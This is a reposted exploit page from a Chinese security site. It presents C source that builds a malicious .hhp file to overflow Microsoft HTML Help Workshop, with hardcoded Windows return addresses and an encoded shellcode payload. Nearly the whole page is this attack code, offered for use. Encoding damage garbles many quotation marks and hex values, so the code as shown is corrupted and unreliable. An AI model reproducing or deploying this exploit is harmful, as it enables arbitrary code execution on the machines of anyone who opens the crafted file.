首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Microsoft HTML Help Workshop .hhp File Handling Buffer Overflow Exploit #4
来源:www.guvenliklab.com 作者:k3xji 发布时间:2006-02-15  

Microsoft HTML Help Workshop ".hhp" File Handling Buffer Overflow Exploit #4

/*

Microsoft HTML Help Workshop .hhp file Full text search stop list file Header Buffer Overflow Exploit
The Buffer Overflow in Full text search stop list file in Options in a HHP file.

Bug found by: k3xji
Exploit coded by: k3xji
Mail: sumerc@gmail.com
Web: www.guvenliklab.com

Change sp2_jmp according to your OS.
*/
#include 搒tdio .h?#include 搒tring .h?
char sta[]=
揫OPTIONS]\n?揅ompatibility=1.1 or later\n?揅ompiled file=k3xji.chm\n?揊ull text search stop list file=?

char fin[]=
揬nDisplay compile progress=No\n?揕anguage=0?1f Turkish\n\n\n?揫INFOTYPES]?

long sp2_jmp = 0?c941eed;
long sp1_jmp = 0?7fb59cc;
long win2ksp4_jmp = 0?c4fedbb;
long win2003sp0_jmp = 0?7fb8bab;
long win2003sp1_jmp = 0?7e8fa6a;

char shellcode[]=
揬x54\x50\x53\x50\x29\xc9\x83\xe9\xde\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\x02″
揬xdd\x0e\x4d\x83\xee\xfc\xe2\xf4\xfe\x35\x4a\x4d\x02\xdd\x85\x08\x3e\x56\x72\x48″
揬x7a\xdc\xe1\xc6\x4d\xc5\x85\x12\x22\xdc\xe5\x04\x89\xe9\x85\x4c\xec\xec\xce\xd4″
揬xae\x59\xce\x39\x05\x1c\xc4\x40\x03\x1f\xe5\xb9\x39\x89\x2a\x49\x77\x38\x85\x12″
揬x26\xdc\xe5\x2b\x89\xd1\x45\xc6\x5d\xc1\x0f\xa6\x89\xc1\x85\x4c\xe9\x54\x52\x69″
揬x06\x1e\x3f\x8d\x66\x56\x4e\x7d\x87\x1d\x76\x41\x89\x9d\x02\xc6\x72\xc1\xa3\xc6″
揬x6a\xd5\xe5\x44\x89\x5d\xbe\x4d\x02\xdd\x85\x25\x3e\x82\x3f\xbb\x62\x8b\x87\xb5″
揬x81\x1d\x75\x1d\x6a\xa3\xd6\xaf\x71\xb5\x96\xb3\x88\xd3\x59\xb2\xe5\xbe\x6f\x21″
揬x61\xdd\x0e\x4d?

int main(int argc,char *argv[])
{
printf(擻nMicrosoft Help WorkShop hhp Header Buffer Overflow?;
printf(擻nBug discovered by k3xji?;
printf(擻nExploit coded by k3xji?;
printf(擻nE-Mail: sumerc@gmail.com?;

FILE *vuln;
char overflow[0?f4];

vuln = fopen(攑oc.hhp?攚+?;
memset(overflow, 0?0, 500);

*(long*)&overflow[0?18] = sp2_jmp;//change OS here
memcpy(overflow+0?2c, &shellcode, sizeof(shellcode));

if(vuln)
{
fprintf(vuln,?s%s\n%s?sta,overflow,fin);
fclose(vuln);
}

return 0;
}




 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·D-Link Wireless Access Point U
·EGS Enterprise Groupware Syste
·Microsoft HTML Help Workshop .
·FlySpray 0.9.7 remote commands
·Microsoft Windows Services Ins
·OpenVMPSd v1.3 Remote Format S
·Microsoft HTML Help Workshop .
·Power Daemon v2.0.2 Remote For
·Invision Power Board Army Syst
·Microsoft Windows Media Player
·Local root exploit for QNX Neu
·Microsoft Windows Media Player
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved